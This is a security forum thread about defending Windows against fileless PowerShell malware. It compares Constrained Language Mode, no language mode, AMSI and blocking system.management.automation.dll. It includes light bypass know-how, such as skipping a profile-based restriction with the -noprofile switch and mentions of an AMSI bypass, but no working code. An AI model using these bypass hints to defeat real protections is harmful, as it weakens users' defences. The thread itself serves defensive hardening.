Now you see me: Exposing fileless malware

Status
Not open for further replies.

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,042
Speaking of System.Management.Automation... Did anyone else but me read the AMSI exploit details?

Satoshi's note: AMSI Bypass With a Null Character

It was an interesting find of his, luckily it was fixed sooner than later
Interesting.:)
This exploit gives the attacker some possibilities, and I think, that there can be more uncovered vulnerabilities.
Anyway, the example of malicious script used in the article, will be blocked by CLM before the exploitation event.
Yet, the script can be slightly modified to fully bypass both AMSI and CLM.
 
Last edited:
  • Like
Reactions: AtlBo and shmu26

ParaXY

Level 6
Verified
Mar 14, 2017
273
What would happen if I set Powershell to use "no language mode"?

What I should have asked is:

If I set Powershell to "no language mode" will anything break in Windows? I'm not talking about running custom PS scripts. Rather, I am asking if it'll cause any issues while logged in with a SUA doing normal day to day tasks (internet, email, etc).
 
D

Deleted member 65228

If I set Powershell to "no language mode" will anything break in Windows? I'm not talking about running custom PS scripts. Rather, I am asking if it'll cause any issues while logged in with a SUA doing normal day to day tasks (internet, email, etc).
Nope I doubt it

I actually disable it and my environments works fine

What software do you use though? If you use anything which uses PowerShell it might cause a problem of course though
 

ParaXY

Level 6
Verified
Mar 14, 2017
273
I use Office 2016, AppGuard, WFC, qBittorrent, Citrix Receiver, DU Meter, CCleaner, SnagIt, Plex, RoboForm, Skype, MusicBee, BeyondCompare and Defender.

I think it'll be ok but just wanted to checkl
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,042
I use Office 2016, AppGuard, WFC, qBittorrent, Citrix Receiver, DU Meter, CCleaner, SnagIt, Plex, RoboForm, Skype, MusicBee, BeyondCompare and Defender.
I think it'll be ok but just wanted to checkl
You will be protected if AppGuard is set to block PowerShell. If not, then PowerShell can for example, run filelessly the script malware.
 

shmu26

Level 85
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,150
Just curious why NLM is so easy to bypass?
 
  • Like
Reactions: AtlBo

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,042
Just curious why NLM is so easy to bypass?
Because it is normally introduced via PowerShell profile, and can be bypassed by -noprofile switch in PowerShell command. I did not find another way to set this language mode.
 
  • Like
Reactions: AtlBo and shmu26
5

509322

Powershell as exploitation vector will be quasi-dead in less than 5 years based on a expert. MS will rely a lot on PS so will increase Windows' security about it.

That's equivalent to saying PowerShell will be 50 % in 5 years. Microsoft has a terrible track record. I'd bet all on my money on a blind Tarot card reader before that expert's statement.
 
5

509322

I use Office 2016, AppGuard, WFC, qBittorrent, Citrix Receiver, DU Meter, CCleaner, SnagIt, Plex, RoboForm, Skype, MusicBee, BeyondCompare and Defender.

I think it'll be ok but just wanted to checkl

@ParaXY, @shmu26

I know you keep PowerShell disabled. Have you experienced any problems with Windows Updates not installing any feature updates or Office 2016 not updating because PowerShell is disabled ?
 
5

509322

That is true in theory and may be the fact in the future. (y)
Bypassing it is not a rocket science because I can do it. :)
But so far, Constrained Language mode is the most effective security against almost all dangerous PowerShell attacks, including targetted attacks based on pentester tools like Metasploit.

Hey, I'm on your side, but I'm not convinced of the effectiveness of CLM by what I have seen in messing with it. So instead I choose the nuclear option. I know you have that PoC. If you have a PoC - and there are other PoCs - I wonder what some criminal has done. So the probability is that there is already nasty stuff somewhere in the works or out there in the wild. We just ain't heard of or seen it yet.

The only effective way to protect a system against PowerShell attacks - right from Microsoft Security itself - is to disable the shell and system.management.automation.dll at the same time. All paths *powershell*, *powershell_ise* and *system.management.automation*.

Even then, I don't fully trust what Microsoft advises will provide absolute security !!! :unsure:


MetaSploit, PowerSploit, and such pen-test tools make for really disingenuous videos where the user had to allow something - like macros - in an Office Word document. Plus the video creator does not explain that such attacks are targeted and instead leaves the Average Joe who doesn't know nor understand anything that is happening in the video, to view and arrive all by themselves at all the wrong face-value conclusions and go crazy in their mind. Now some would argue that the video creator is lying by omission to the viewer as well as creating fear, uncertainty and doubt.

It's basically in the same vein as the IT security news that reports things without fully explaining things - the exceptions and caveats - to the general public.
 
Last edited by a moderator:

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,042
Hey, I'm on your side, but I'm not convinced of the effectiveness of CLM by what I have seen in messing with it. So instead I choose the nuclear option. I know you have that PoC. If you have a PoC - and there are other PoCs - I wonder what some criminal has done. So the probability is that there is already nasty stuff somewhere in the works or out there in the wild. We just ain't heard of or seen it yet.

The only effective way to protect a system against PowerShell attacks - right from Microsoft Security itself - is to disable the shell and system.management.automation.dll at the same time. All paths *powershell*, *powershell_ise* and *system.management.automation*.

Even then, I don't fully trust what Microsoft advises will provide absolute security !!! :unsure:


MetaSploit, PowerSploit, and such pen-test tools make for really disingenuous videos where the user had to allow something - like macros - in an Office Word document. Plus the video creator does not explain that such attacks are targeted and instead leaves the Average Joe who doesn't know nor understand anything that is happening in the video, to view and arrive all by themselves at all the wrong face-value conclusions and go crazy in their mind. Now some would argue that the video creator is lying by omission to the viewer as well as creating fear, uncertainty and doubt.

It's basically in the same vein as the IT security news that reports things without fully explaining things - the exceptions and caveats - to the general public.
I did not have in mind that I disagree with you. :)
We totally agree about the potential strength/weakness of CLM. (y)
The best, but also the most radical method is blocking all instances of system.management.automation.dll . Some people do not like such radical methods, and then CLM is for them.
CLM is very effective (more effective than Antivirus), only because of malc0ders' habits and tons of malicious scripts that are still very effective when applying functions that are blocked by CLM.
Additionally, CLM works natively on Windows 8+, so one has to update the PowerShell to the version 3.0 on Windows 7 (most users still use PowerShell 2.0).
I analyzed many PowerShell scripts embedded in malicious documents from Malware Vault (Samples) + many scripts scattered on several websites, and 99% of them uses advanced PowerShell functions blocked by CLM. Some de-obfuscated examples are here:
How-to Guide - How to de-obfuscate PowerShell script commands (Examples).
They are very effective because almost nobody uses CLM. It is possible that malc0ders do not bother to fight CLM (so far), because the users who use CLM are probably experienced and this would shorten the malware life.
That is why I wrote in my previous post that in theory, your statement is true:
Malc0ders do not need the stuff that Constrained Language Mode disables to completely smash a system.
If the malc0ders will change their habits or when the scripts will not be so effective, then your statement will be true in the wild. That will probably happen in the future if Microsoft will abandon this feature.(y)
 
Last edited:
5

509322

I did not have in mind that I disagree with you. :)
We totally agree about the potential strength/weakness of CLM. (y)
The best, but also the most radical method is blocking all instances of system.management.automation.dll . Some people do not like such radical methods, and then CLM is for them.
CLM is very effective (more effective than Antivirus), only because of malc0ders' habits and tons of malicious scripts that are still very effective when applying functions that are blocked by CLM.
Additionally, CLM works natively on Windows 8+, so one has to update the PowerShell to the version 3.0 on Windows 7 (most users still use PowerShell 2.0).
I analyzed many PowerShell scripts embedded in malicious documents from Malware Vault (Samples) + many scripts scattered on several websites, and 99% of them uses advanced PowerShell functions blocked by CLM. Some de-obfuscated examples are here:
How-to Guide - How to de-obfuscate PowerShell script commands (Examples).
They are very effective because almost nobody uses CLM. It is possible that malc0ders do not bother to fight CLM (so far), because the users who use CLM are probably experienced and this would shorten the malware life.
That is why I wrote in my previous post that in theory, your statement is true:
Malc0ders do not need the stuff that Constrained Language Mode disables to completely smash a system.
If the malc0ders will change their habits or when the scripts will not be so effective, then your statement will be true in the wild. That will probably happen in the future if Microsoft will abandon this feature.(y)

Unless a home user is using PowerShell to manage Server, IIS, SharePoint, MySQL, PowerShell Remoting, scripting in PowerShell, creating PowerShell tools, etc, etc - they should disable it for security purposes. It's just a sound security practice to eliminate that attack surface. Otherwise they invoke the "8 Ball Rule" and throw the dice.
 
Last edited by a moderator:

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,042
Deep in the heart, I would like to disable the PowerShell library system.management.automation.dll.:)
PROS:

  • After blocking this library the PowerShell 3+ is dead.
  • One can copy PowerShell executables to another folder with another filename and it still will be dead.
  • One can compile an application that uses PowerShell functions directly from this library (not using PowerShell executables) and this also will fail.
CONS:

  • There is no good Windows built-in mechanism to block this DLL in Windows Home and Pro.
  • One could use SRP with DLL checking but this will break Edge and can slow down the system.
  • Microsoft announced that PowerShell will replace CMD, and CMD is commonly used by some system scheduled tasks and 3-rd party programs.
  • The scheduled task sdiagnhost.exe can often trigger troubleshooter scripts TS_WERQueue.ps1, TS_DiagnosticHistory.ps1, and the library of functions CL_Utility.ps1
  • Some popular applications use PowerShell like: Chocolatey, K-lite codec pack, etc.
  • PowerShell can be used by hardware vendors to update their software.
So, blocking the PowerShell library system.management.automation.dll can be recommended to advanced users.
I would not recommend it on computers of average users.​
 
Status
Not open for further replies.

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top